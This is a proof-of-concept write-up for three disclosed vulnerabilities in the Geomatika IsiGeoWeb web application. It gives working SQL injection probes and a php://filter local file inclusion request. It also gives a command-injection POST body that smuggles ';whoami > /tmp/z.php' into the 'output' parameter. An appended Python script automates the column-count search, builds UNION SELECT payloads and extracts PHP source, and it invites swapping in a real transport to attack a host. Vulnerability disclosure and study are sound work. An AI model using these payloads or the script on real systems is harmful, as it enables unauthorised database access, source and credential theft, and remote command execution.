poc_geomatika_isigeoweb.md

File metadata and controls

26 lines (20 loc) · 1.8 KB

Vulnerabilities covered by CVE-2023-23565, CVE-2023-23564 and CVE-2023-23563

  • Authenticated (standard user) union-based SQL injections on the page /v6/lib/xhr_data.php. The following POST parameters are vulnerable: "deb", "order", "nbpp" and "layer".

PoC (an ORDER BY probe in "layer": 88 succeeds and 89 fails, so the injected SELECT has 88 columns, which is the column count a UNION SELECT has to match):

```
cmd=getData&layer=1856+ORDER+BY+88&deb=1&order=&way=false&nbpp=1&h=791  => no error
cmd=getData&layer=1856+ORDER+BY+89&deb=1&order=&way=false&nbpp=1&h=791  => SQL error in the response
```

Passwords of webapp users are stored both in plaintext and as Bcrypt hashes.
  • With administrator privileges on the webapp, local file inclusion on the page /v5/admin/template.php through the GET parameter "page". Only PHP files can be read (the ".php" extension is appended server-side, which is why the PoC omits it), but the php://filter wrapper returns their source instead of executing them. PoC:

```
/v5/admin/template.php?page=php://filter/read=convert.base64-encode/resource=./log_user
```

The content of "log_user.php" is included in the server response, base64-encoded.
  • Authenticated (standard user) command injection on the page /v6/lib/xhr_impconf.php. The POST parameters "input" and "output" are used to build a system command under certain circumstances (the PoC below reaches that code path with cmd=mergePdf).

poc_geomatika_isigeoweb.jpg

  • PoC (POST body; the "output" value traverses out of the intended directory and appends a second shell command):

```
&urlPdf=a.pdf&PrevStateKey=BBOX%3D1509584.4653464085%2C3224940.898303422%2C1510919.468016414%2C3225740.899903425%7CSRS%3D%2Binit%3DEPSG%3A3944%7CMAPSIZE%3D%7CLAYERS%3Dquartiers_gq3%2CO%2CO%2CNom+de+voie%2Cselection%2Cv_projets_gq3_web%7CCLASSES%3D0%3B0%3B0%3B0%3B0%3B0%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%7CSCALE%3D9999.980000006299&baseLayer=O&angle=O&units=O&opacity=O,-O,-O,-999,-999&formatp=A4&orip=paysage&echelle=5000&commentaire=O&titre=O+1&legendeimp=ok&legendeimppage=ok&miseForme=undefined&cmd=mergePdf&input={'':''}&output=../../../../../../dev/null;whoami+>+/tmp/z.php
```
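The following helper is an added example, not part of the original PoC and not Geomatika code. It turns the two manual probes above, the ORDER BY column count on /v6/lib/xhr_data.php and the php://filter read on /v5/admin/template.php, into repeatable checks: the column count is found by binary search on the pass/fail boundary instead of one request per column, and the base64 that the filter wrapper embeds in the response is located and decoded. The `send` callable, the SQL error markers, the 88-column figure and the fake log_user.php source used by the simulated target are assumptions; against a real host you supply a transport that carries the authenticated session cookie.

```python
import base64
import re
from typing import Callable, Dict, Optional

# A transport sends (path, method, params) to the target as an authenticated
# user and returns the response body as text (e.g. a wrapper around
# requests.Session).  Keeping it injectable lets the logic run offline.
Transport = Callable[[str, str, Dict[str, str]], str]

XHR_DATA = "/v6/lib/xhr_data.php"
TEMPLATE = "/v5/admin/template.php"
# Strings that indicate the injected ORDER BY broke the query.  Assumption: the
# PoC only says "SQL error in the response", so calibrate against the target.
SQL_ERROR_MARKERS = ("SQL error", "syntax error", "ORDER BY position")


def order_by_params(layer_id: int, n: int) -> Dict[str, str]:
    """Body of the PoC request with `layer` carrying an ORDER BY n probe."""
    return {"cmd": "getData", "layer": f"{layer_id} ORDER BY {n}", "deb": "1",
            "order": "", "way": "false", "nbpp": "1", "h": "791"}


def looks_like_sql_error(body: str) -> bool:
    return any(marker in body for marker in SQL_ERROR_MARKERS)


def count_columns(send: Transport, layer_id: int = 1856, max_cols: int = 512) -> int:
    """Binary-search the column count of the injected SELECT.

    ORDER BY n succeeds for n <= columns and errors for n > columns, so the
    boundary (88 passes, 89 fails in the PoC) is found in ~log2(max_cols) requests."""
    if looks_like_sql_error(send(XHR_DATA, "POST", order_by_params(layer_id, 1))):
        raise RuntimeError("ORDER BY 1 already errors: injection point not confirmed")
    if not looks_like_sql_error(send(XHR_DATA, "POST", order_by_params(layer_id, max_cols))):
        raise RuntimeError(f"ORDER BY {max_cols} succeeds: raise max_cols or check the oracle")
    lo, hi = 1, max_cols  # invariant: lo passes, hi fails
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if looks_like_sql_error(send(XHR_DATA, "POST", order_by_params(layer_id, mid))):
            hi = mid
        else:
            lo = mid
    return lo


def union_params(layer_id: int, ncols: int, probe: str, position: int = 0) -> Dict[str, str]:
    """Next step after the count: UNION SELECT with NULL in every column but one.

    `probe` is the expression to reflect; the trailing "-- " comment terminator
    assumes a MySQL/PostgreSQL-style dialect (assumption, the PoC names none)."""
    cols = ["NULL"] * ncols
    cols[position] = probe
    params = order_by_params(layer_id, 1)
    params["layer"] = f"{layer_id} UNION SELECT {','.join(cols)}-- "
    return params


def php_filter_resource(script_basename: str) -> str:
    """Value for template.php?page=...; the app appends ".php" itself."""
    return f"php://filter/read=convert.base64-encode/resource=./{script_basename}"


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def read_php_source(send: Transport, script_basename: str) -> Optional[str]:
    """Fetch a server-side .php file through the filter wrapper and decode it.

    convert.base64-encode turns the included file into one long base64 run in
    the page; the longest such run is taken to be the file."""
    body = send(TEMPLATE, "GET", {"page": php_filter_resource(script_basename)})
    runs = _B64_RUN.findall(body)
    if not runs:
        return None
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


# --- Constructed stand-in for the target so the helpers run offline. ----------
SIM_COLUMNS = 88  # matches the 88/89 boundary observed in the PoC
SIM_LOG_USER = "<?php\n// constructed sample, not the real log_user.php\n$db_pass = 'example';\n"


def simulated_target(path: str, method: str, params: Dict[str, str]) -> str:
    if path == XHR_DATA and method == "POST":
        m = re.search(r"ORDER BY (\d+)$", params.get("layer", ""))
        if m and int(m.group(1)) > SIM_COLUMNS:
            return f'{{"status":"SQL error: ORDER BY position {m.group(1)} is not in select list"}}'
        return '{"status":"ok","rows":[]}'
    if path == TEMPLATE and method == "GET":
        if params.get("page", "") == php_filter_resource("log_user"):
            b64 = base64.b64encode(SIM_LOG_USER.encode()).decode()
            return "<html><body>" + b64 + "</body></html>"
        return "<html><body>not found</body></html>"
    return ""


if __name__ == "__main__":
    n = count_columns(simulated_target)
    print("columns:", n)
    print(union_params(1856, n, "version()")["layer"])
    print(read_php_source(simulated_target, "log_user"))
```

Swap `simulated_target` for a real transport to run it against a host; the error markers are the only part that depends on the application's wording, so confirm them manually with the 88/89 pair first.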